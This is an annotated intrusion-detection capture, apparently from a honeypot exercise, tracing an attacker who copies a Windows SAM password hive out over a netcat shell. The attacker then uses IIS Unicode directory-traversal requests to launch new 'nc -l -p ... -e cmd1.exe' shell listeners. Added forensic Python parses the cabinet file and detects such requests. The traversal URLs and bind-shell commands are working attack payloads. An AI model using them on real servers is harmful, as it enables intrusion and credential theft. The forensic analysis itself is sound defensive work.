!@# Navigates the remote shell back to C:\, where the listing shows har.txt at 5,327 bytes (the same size as the freshly written sam._), and types it out. The output starts with "MSCF", the Microsoft cabinet signature, with the name $$hive$$.tmp a few bytes in: this is the compressed SAM hive, now in the attacker's hands over the netcat session.
[**] netcat session 6969 [**]
02/04-06:08:51.092457 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:26494 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBF741D Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
type har.txt..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.196146 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:26750 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x2CBF742B Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
MSCF............,...................I........`........D*.h .$$hi
ve$$.tmp.....~..`CK..t.5........x?..../.)..6.c..C.....6h.u9.-.P.Cv..p..u.
..o...#....YE\......"..90r._...~..j....ZFm... .....7>NC..T......
.....w,..f..|..Yb|...8[..e.g=..a..,.......r.j.....c..g.z....Z.f.
.....q...{....c8..o......M.j#.....\.;...\.
{'\"...I..,.'...#.z.|8.fc...v....}....[...ZV.A.....K.o../.Wmgg..
/6.x.Cy#..%.k..<[..!N_~...L....:AqW.......C..^..::.RW...R..O.-o.
....x..Fkr.x>..3....5.+.q,cz[i.m.a.S-._.......l+?=@r8.=.e.._.;.v
6k..*/~e).i..=........ g..<.......p......H-............1.......m
..g.$=..I..Z&......=.....(...ev.pq."...v8..?.....2..z>...b.i.kj...
P.<.....>'4.x..U.e.{J..J.*......*.K.*..e.*.oOieUE.w.....G~.Y...&
..tr....-..Y'...VN..yT./...T...<....#.[.....Y......Cy...4.D.>...
R...p.3}MS8.(Q".HCH..<....a.^.2.yj.e.a.'.>E.....Gc....7....k.."Q
...3.....W.[...rE.....7.......U.......h.....H.?.e.l.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.196158 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27006 IpLen:20 DgmLen:186 DF
***AP*** Seq: 0x2CBF79DF Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
..........o.$e...".z..)v...............v..t>...G..O&..9..^......
...2...UR.b..[..`..B&O.k$\.^1..Zm.7E.$....>.V...m..Vh..../`k...<
2.............gQ|.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.199957 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27262 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x2CBF7A71 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
....8..\5.^..C.......gi...a.\..........A.....R.\......^....6H.q}
.tt{.L.j..b..T..^.........w].gq>..>.)...Qb..".;`z....3....'..L..
Z.(.....a.S-..?.....b.q.P.\.|%...o-F.x.....{.>...xus..S....U....
-..M._|2.z.0..\.v.....29...._...v._F..?.Y..........2O.....jZ....
.].......v..v)......g8\f8....1a/%.........3.._............733.\.
..f...Y..~.*duZ........(#..|.D.....>.m.Y.f.+.bW...>..M.a.ogu.pM.
..7...\X.:o8..5z9R...%e.|B.......e.._Fm1.oj.z..].....P.......V..
......0....Z..`..rY6...W..^Q|.^...y......f...K+..2D..P...(g.P.8.
.z..mM...k|nz.Z1..;...^...ZG.....t..l.H)...o.....o`.=...........
).J'..a....6.rm..../.;F..../%...}.3..*_.....}.[.-....M..........
...L....;V;.....k.P.q.....f...(...S..<(.Q..<..m/+..j.#.....T....
m ..........p?.{.'jCy...BvK}..e}..d...."-.......(#?)....^Zh.S..o.:..7[G..<.....m2..$.Ml..A...[....
/.=..../._o}..W...*...\n%..'.....^..7...o+.....1.-.Q.9.-.~D8....
...........mGI.9N...S>....5...(..^...u.|.o......>?..K.......G.-4
..0.q.r..}....%.y..p....{....!...Q.G.......;.s..Og.\.J.W..Z._M.4
i!'.}......A....1....R.~..5.*..{.m..........^.[_k..qS.......O..}
.\...............c.=.....D............o........k.).Z..U...G.....
.nl.h...~......_p....^..^..........;..U...?..^..|{......g.':(...
.....+...t...,.._...L.....o.1...._H...../".&...KW...M..f........
.......O...#.'..f.)Y..)..k..v.od..M.:Yb..pZg.p...T..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.199970 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27518 IpLen:20 DgmLen:135 DF
***AP*** Seq: 0x2CBF8025 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
6J;...'.-~F...........'RGb0...&"......x..._1.#....<.....8N.P.p..
....K.'.....;.~..u.....Ob{z."..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.201340 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27774 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x2CBF8084 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
.N....h........\....)..\.`.....k..M......=..?.....L........mV.K.
..}.1.....+....[UC...7.=e.._:5.v........c;......kv0...`s..).5...
.u.)....c....c|M..D....Lq.%..q.5..T...k.[........8.1^..u.......u
.....%n1...=nQ..j.......+h....C]<0...ck.G...4....Oh.c...3.d..*]N
.r....~.glq..^....e...1....d.....(.vb.rM\........j.w...7....;...
6....~u:ZY.f.?...k..G........mPK..z........=S?`.=..o8.....l_A.".
:..M;..N[.Jy.....[.& ._T|.I...$..OL.c..E,...X.U.yp0.o.
s6.4..~.2v..`...v....W...g.y.}........A..W].#]..*:..w.v>.D,.....
..r.F=.^...>.........Q.......+......~"My.>Y...Uu..Z~.R...k....K.
_...w+..!...q!|Bmur~...Mh.1.s~K..N.=.f.-./..i7..]..\..V.....Aq..
......4.gY..U.nQ....q.o..?....T.*....q".a.">...s....a.9~....)...
c.t~5'..k..^...%N&..|...............F...z../9............h..e...
.....n..?.8..D..t.....b%.~.A....\FC...|...?.V.`..P......&.].\c..
..pO....|.XN...m..<........r....4..%.....V.....22...!.>.*.9...z.
.....8.L.3<..y.}...,....../...4p.p...@.'..7..I'3..._...%........
?l..V.......F...[.[...F{...z.9.!%.L.$....60Z....T.!.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.201354 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28030 IpLen:20 DgmLen:184 DF
***AP*** Seq: 0x2CBF8638 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
k.0...a6F.h>...Oh...va.I...Cr\U..k...4.......`&.....mbe....E....
W:......3.h.mr...d>nj...W.........)........x...u.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:08:51.542517 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28286 IpLen:20 DgmLen:628 DF
***AP*** Seq: 0x2CBF86C8 Ack: 0x9E4401F7 Win: 0x210F TcpLen: 20
......1....P(..+......`...O.c>2...q..C......Jk....m.....K...;B..
.]..0.C.....n......2Xo......T....u...lQ|...j..ee:.];...r...YAp.=
.......vuE...2......)X.H.i...z.M.S.I..N.;...{........zz.9..z...z
.....R..Ov... .[.........`4....3.[H).''.L0x........y.zM.r...>P..
..F.=......>K....zH'.o.z}......T=....>N{W....AM..G...Q...ye._.u.
.......>...G;....o*....`7._:.........`l............@.CNB&..g.q.S
....#~.#..!.}.GZ!.@..\.$..9.y.rM.....
L.........~.e!.A&?.. ' .A.y..... ..B.......:.. .......9.^..8df_.
....yB..d...{9..d.T......Y....1".7.6.k..K..eP.M...x..o8.._...2..
..C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
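!@# Added example (mine, not part of the capture or the original notes): a check on what actually came back through har.txt. The bytes the shell echoed start with "MSCF" and carry "$$hive$$.tmp" a few bytes later, which is where a cabinet's CFFILE record keeps its file name; the six bytes before the name are the DOS date, time and attributes, and the printable "D*" there ('D' = 0x44, '*' = 0x2A) read little-endian is 0x2A44, i.e. 2001-02-04, the day of the capture. The Python below parses a cabinet header and lists its files with their DOS timestamps. build_cab() makes a constructed, zero-filled sample cabinet so the parser can be exercised offline; it is not the attacker's har.txt, and the helper names are my own.

```python
"""Added example (not part of the original capture or its analysis): list the
files carried by a Microsoft Cabinet (MSCF) image, the format in which rdisk
wrote the compressed hive that came back through har.txt."""

import struct

CFHEADER = "<4sIIIIIBBHHHHH"   # signature, reserved1, cbCabinet, reserved2,
                                # coffFiles, reserved3, verMinor, verMajor,
                                # cFolders, cFiles, flags, setID, iCabinet
CFFOLDER = "<IHH"               # coffCabStart, cCFData, typeCompress
CFFILE = "<IIHHHH"              # cbFile, uoffFolderStart, iFolder, date, time, attribs
CFDATA = "<IHH"                 # csum, cbData, cbUncomp


def dos_datetime(date: int, time: int):
    """Unpack packed DOS date/time fields: (year, month, day, hour, minute, second)."""
    return (1980 + (date >> 9), (date >> 5) & 0xF, date & 0x1F,
            time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2)


def list_cab(data: bytes) -> dict:
    """Parse the CFHEADER and every CFFILE record of a cabinet held in memory."""
    if data[:4] != b"MSCF":
        raise ValueError("not a cabinet: signature %r" % data[:4])
    (_, _, cb_cabinet, _, coff_files, _, ver_minor, ver_major,
     c_folders, c_files, flags, _, _) = struct.unpack_from(CFHEADER, data, 0)
    files = []
    off = coff_files                  # reserve fields (flags bit 2) may follow the
    for _ in range(c_files):          # header, but coffFiles already points past them
        size, folder_start, i_folder, date, time, attribs = struct.unpack_from(CFFILE, data, off)
        off += struct.calcsize(CFFILE)
        end = data.index(b"\0", off)  # szName is NUL-terminated
        files.append({"name": data[off:end].decode("latin-1"), "size": size,
                      "folder": i_folder, "mtime": dos_datetime(date, time),
                      "attribs": attribs})
        off = end + 1
    return {"cabinet_size": cb_cabinet, "version": (ver_major, ver_minor),
            "folders": c_folders, "flags": flags, "files": files}


def build_cab(name: bytes, payload: bytes, date: int = 0x2A44, time: int = 0x68E0) -> bytes:
    """Constructed sample cabinet: one folder, one stored (uncompressed) file.
    The default date 0x2A44 is 2001-02-04, what the 'D*' bytes in the captured
    dump decode to; the payload is whatever the caller passes, not a real hive."""
    cffile = struct.pack(CFFILE, len(payload), 0, 0, date, time, 0x20) + name + b"\0"
    coff_files = struct.calcsize(CFHEADER) + struct.calcsize(CFFOLDER)
    coff_data = coff_files + len(cffile)
    cfdata = struct.pack(CFDATA, 0, len(payload), len(payload)) + payload
    cb_cabinet = coff_data + len(cfdata)
    header = struct.pack(CFHEADER, b"MSCF", 0, cb_cabinet, 0, coff_files, 0,
                         3, 1, 1, 1, 0, 0, 0)
    folder = struct.pack(CFFOLDER, coff_data, 1, 0)   # typeCompress 0 = none
    return header + folder + cffile + cfdata


if __name__ == "__main__":
    sample = build_cab(b"$$hive$$.tmp", b"\0" * 64)
    print(list_cab(sample))
```

!@# Run against a file pulled from a real incident, list_cab() tells you at once whether a ".txt" is really a cabinet, what it is called inside, how big the uncompressed hive is, and when it was packed, all without expanding it.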
[**] netcat session 6969 [**]
02/04-06:09:54.655927 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32126 IpLen:20 DgmLen:166 DF
***AP*** Seq: 0x2CBF8914 Ack: 0x9E440202 Win: 0x2104 TcpLen: 20
......dir..The name specified is not recognized as an..internal
or external command, operable program or batch file.....C:\>..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:09:55.049853 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32382 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBF8992 Ack: 0x9E440205 Win: 0x2101 TcpLen: 20
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:09:57.274488 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33150 IpLen:20 DgmLen:170 DF
***AP*** Seq: 0x2CBF8996 Ack: 0x9E44020D Win: 0x20F9 TcpLen: 20
......dir..The name specified is not recognized as an..internal
or external command, operable program or batch file.....C:\>..C:
\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:10:03.619072 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:35454 IpLen:20 DgmLen:178 DF
***AP*** Seq: 0x2CBF8A18 Ack: 0x9E440220 Win: 0x20E6 TcpLen: 20
......cd wiretrip..The name specified is not recognized as an..i
nternal or external command, operable program or batch file.....
C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:10:08.225729 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37758 IpLen:20 DgmLen:174 DF
***AP*** Seq: 0x2CBF8AA2 Ack: 0x9E44022F Win: 0x20D7 TcpLen: 20
......exit.....The name specified is not recognized as an..inter
nal or external command, operable program or batch file.....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:10:10.128556 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38782 IpLen:20 DgmLen:171 DF
***AP*** Seq: 0x2CBF8B28 Ack: 0x9E44023B Win: 0x20CB TcpLen: 20
......exit..The name specified is not recognized as an..internal
or external command, operable program or batch file.....C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The original remote shell on port 6969 is no longer usable: from 06:09:54 every command arrives with six non-printable bytes in front of it, so cmd.exe rejects even dir and exit as unrecognised commands, and the attacker abandons it.
!@# Uses Unicode vulnerability to start a new nc listener on port 6969. Note the cmd1.exe in the path: a copy of cmd.exe under another name, left in the msadc directory (the later listing of that directory shows it alongside nc.exe).
[**] Resrticted http-iis-unicode-binary [**]
02/04-06:10:42.651430 213.116.251.162:1987 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13866 IpLen:20 DgmLen:502 DF
***AP*** Seq: 0xB7662FA6 Ack: 0x2CD820AB Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HT
TP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pj
peg, application/vnd.ms-excel, application/msword, application/v
nd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding:
gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; W
indows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection:
Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerability to start a second nc listener, this time on port 6968 (presumably because 6969 is still bound by the first listener)
[**] Resrticted http-iis-unicode-binary [**]
02/04-06:11:19.684228 213.116.251.162:1992 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13982 IpLen:20 DgmLen:502 DF
***AP*** Seq: 0xB7E599D6 Ack: 0x2CD8A44C Win: 0x1DF6 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6968+-e+cmd1.exe HT
TP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pj
peg, application/vnd.ms-excel, application/msword, application/v
nd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding:
gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; W
indows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection:
Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
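!@# Added example, not part of the original capture or its author's notes: a small
!@# Python detector for the two requests above. It decodes the request target the way
!@# the unpatched IIS decoder did, folding overlong two-byte sequences such as %C0%AF
!@# into '/' and %C1%9C or %C1%1C into '\', then flags '..' traversal, any command
!@# handed to an .exe, and the port of an 'nc -l -p' listener. The sample request lines
!@# are constructed (the first two follow the captured requests, the third is the classic
!@# %c1%1c variant, the fourth is benign); the function names and the simplified decoding
!@# rule are my own assumptions, not an IDS API.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request lines: the first two follow the requests seen in this
# capture, the third is the classic %c1%1c variant, the fourth is benign.
SAMPLE_REQUESTS = [
    "GET /msadc/....../....../..%AF../..%C0%AF../program%20files/common%20files"
    "/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1",
    "GET /guest/default.asp/....../....../..%AF../..%C0%AF../boot.ini HTTP/1.1",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.1",
    "GET /guest/default.asp HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(\w+)\s+(\S+)\s+HTTP/\d\.\d$")
OVERLONG = re.compile(r"%C[01]%[0-9A-Fa-f]{2}", re.IGNORECASE)
NC_LISTENER = re.compile(r"\bnc(?:\.exe)?\b.*?-l\b.*?-p\s+(\d+)", re.IGNORECASE)


def iis_lenient_decode(target: str) -> str:
    """Percent-decode, then fold every 0xC0-0xDF lead byte with the byte after it
    as ((b1 & 0x1F) << 6) | (b2 & 0x3F) without rejecting overlong forms.
    Assumption: a simplified model of the unpatched IIS 4/5 decoder, which is the
    behaviour the traversal in this capture relies on."""
    raw = unquote_to_bytes(target)
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def analyze_request(line: str) -> dict:
    """Classify one HTTP request line (hypothetical helper, not an IDS API)."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        raise ValueError(f"not a request line: {line!r}")
    method, target = m.groups()
    path, _, query = target.partition("?")
    decoded = iis_lenient_decode(path)
    # Normalise both separators, then look for a '..' segment anywhere in the path.
    segments = decoded.replace("\\", "/").split("/")
    traversal = ".." in segments
    # IIS passes the query string to the executable as its argument list ('+' = space).
    command = query.replace("+", " ") if query and decoded.lower().endswith(".exe") else None
    port = None
    if command:
        pm = NC_LISTENER.search(command)
        port = int(pm.group(1)) if pm else None
    return {
        "method": method,
        "path": path,
        "decoded_path": decoded,
        "overlong_utf8": bool(OVERLONG.search(path)),
        "traversal": traversal,
        "command": command,
        "listener_port": port,
    }


def scan(lines) -> list:
    """Return the analyses of every request that traverses out of its web root."""
    return [r for r in map(analyze_request, lines) if r["traversal"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(f"{hit['decoded_path']}  overlong={hit['overlong_utf8']} "
              f"cmd={hit['command']!r} listener={hit['listener_port']}")
```

!@# Running it prints the three traversal hits and stays silent on the benign request;
!@# the first hit reports the command '/c nc -l -p 6969 -e cmd1.exe' and listener port
!@# 6969, which is what the capture above shows being started.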
!@# Intruder connects to listener on port 6968
[**] netcat session 6968 [**]
02/04-06:11:24.497961 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:52350 IpLen:20 DgmLen:155 DF
***AP*** Seq: 0x2CD8D444 Ack: 0xB8197A7A Win: 0x2238 TcpLen: 20
Microsoft(R) Windows NT(TM)..(C) Copyright 1985-1996 Microsoft C
orp.....C:\Program Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:26.307841 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:52862 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CD8D4B7 Ack: 0xB8197A7F Win: 0x2233 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 07:04a ...02/04/01 07:
04a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:26.850930 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:53118 IpLen:20 DgmLen:810 DF
***AP*** Seq: 0x2CD8D57F Ack: 0xB8197A7F Win: 0x2233 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..09/25/97 08:28a
172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23,312 msa
dcf.dll..09/25/97 08:24a 91,408 msadco.dll..09/2
5/97 08:19a 5,120 msadcor.dll..09/26/97 08:19a
42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..10/02/97 07:28a 19,388 readme.
txt.. 13 File(s) 628,653 bytes..
1,690,259,968 bytes free....C:\Program Files\Commo
n Files\system\msadc>..C:\Program Files\Common Files\system\msad
c>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:29.909437 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:54654 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CD8D881 Ack: 0xB8197A8C Win: 0x2226 TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries 'net session' from new remote shell, but access is still denied.
[**] netcat session 6968 [**]
02/04-06:11:30.378043 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:54910 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x2CD8D88E Ack: 0xB8197A8C Win: 0x2226 TcpLen: 20
System error 5 has occurred......Access is denied........C:\Prog
ram Files\Common Files\system\msadc>..C:\Program Files\Common Fi
les\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:32.959720 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:55678 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CD8D91F Ack: 0xB8197A91 Win: 0x2221 TcpLen: 20
cd\....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:34.161858 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:56190 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CD8D930 Ack: 0xB8197A96 Win: 0x221C TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6968 [**]
02/04-06:11:34.677005 172.16.1.106:6968 -> 213.116.251.162:1993
TCP TTL:127 TOS:0x0 ID:56446 IpLen:20 DgmLen:807 DF
***AP*** Seq: 0x2CD8D9F8 Ack: 0xB8197A96 Win: 0x221C TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p